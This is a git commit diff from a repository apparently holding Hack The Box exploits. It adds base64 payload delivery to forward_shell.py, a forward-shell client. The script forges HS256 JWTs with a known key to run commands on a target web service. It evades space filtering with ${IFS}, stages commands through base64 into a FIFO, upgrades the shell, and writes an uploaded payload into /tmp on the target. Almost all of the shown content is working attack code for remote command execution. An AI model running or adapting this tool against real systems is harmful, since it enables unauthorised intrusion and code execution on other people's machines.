locusworks/htb-exploits
4
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Added option to send a base64 payload

Browse Source
This commit is contained in:
Isaac Parenteau
2022-03-04 21:22:13 -05:00
parent c66a96f3d4
commit f5e656c74e
1 changed files with 28 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

35
forward_shell.py
View File

@ -12,6 +12,8 @@ import time
import jwt import jwt
PAYLOAD = """Base64 Payload goes here"""
class WebShell(object): class WebShell(object):
def __init__(self, remote_host='http://172.16.1.22', remote_port=3000, def __init__(self, remote_host='http://172.16.1.22', remote_port=3000,
@ -55,15 +57,15 @@ class WebShell(object):
self.run_raw_command(clear_output) self.run_raw_command(clear_output)
time.sleep(self.interval) time.sleep(self.interval)
def run_raw_command(self, cmd, timeout=50, space_delimiter='${IFS}'): def run_raw_command(self, command, timeout=50, space_delimiter='${IFS}'):
""" """
:param cmd: :param command:
:param timeout: :param timeout:
:param space_delimiter: :param space_delimiter:
:return: :return:
""" """
payload = {'cmd': cmd.replace(' ', space_delimiter)} payload = {'cmd': command.replace(' ', space_delimiter)}
token = jwt.encode(payload, self.key, algorithm='HS256') token = jwt.encode(payload, self.key, algorithm='HS256')
headers = {'Authorization': f'Bearer {token.decode()}'} headers = {'Authorization': f'Bearer {token.decode()}'}
@ -73,15 +75,16 @@ class WebShell(object):
except: except:
pass pass
def write_command(self, cmd): def write_command(self, command, timeout=50):
""" """
:param cmd: :param timeout:
:param command:
:return: :return:
""" """
b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') b64cmd = base64.b64encode('{}\n'.format(command.rstrip()).encode('utf-8')).decode('utf-8')
stage_cmd = f'echo {b64cmd} | base64 -d>{self.stdin}' stage_cmd = f'echo {b64cmd} | base64 -d>{self.stdin}'
self.run_raw_command(stage_cmd) self.run_raw_command(stage_cmd, timeout)
time.sleep(self.interval * 1.1) time.sleep(self.interval * 1.1)
def upgrade_shell(self): def upgrade_shell(self):
@ -93,6 +96,22 @@ class WebShell(object):
print(upgrade_shell) print(upgrade_shell)
self.write_command(upgrade_shell) self.write_command(upgrade_shell)
def send_payload(self):
"""
:return:
"""
print('Sending payload')
payloads = PAYLOAD.splitlines()
payload_cmd = f'cd /tmp && echo {payloads.pop(0)} > myFile.txt'
self.write_command(payload_cmd, timeout=30)
for p in payloads:
payload_cmd = f'cd /tmp && echo {p} >> myFile.txt'
self.write_command(payload_cmd, timeout=30)
print('Done Sending Payload')
prompt = "Please Subscribe> " prompt = "Please Subscribe> "
s = WebShell() s = WebShell()
@ -101,5 +120,7 @@ while True:
if cmd == "upgrade": if cmd == "upgrade":
prompt = "" prompt = ""
s.upgrade_shell() s.upgrade_shell()
elif cmd == "payload":
s.send_payload()
else: else:
s.write_command(cmd) s.write_command(cmd)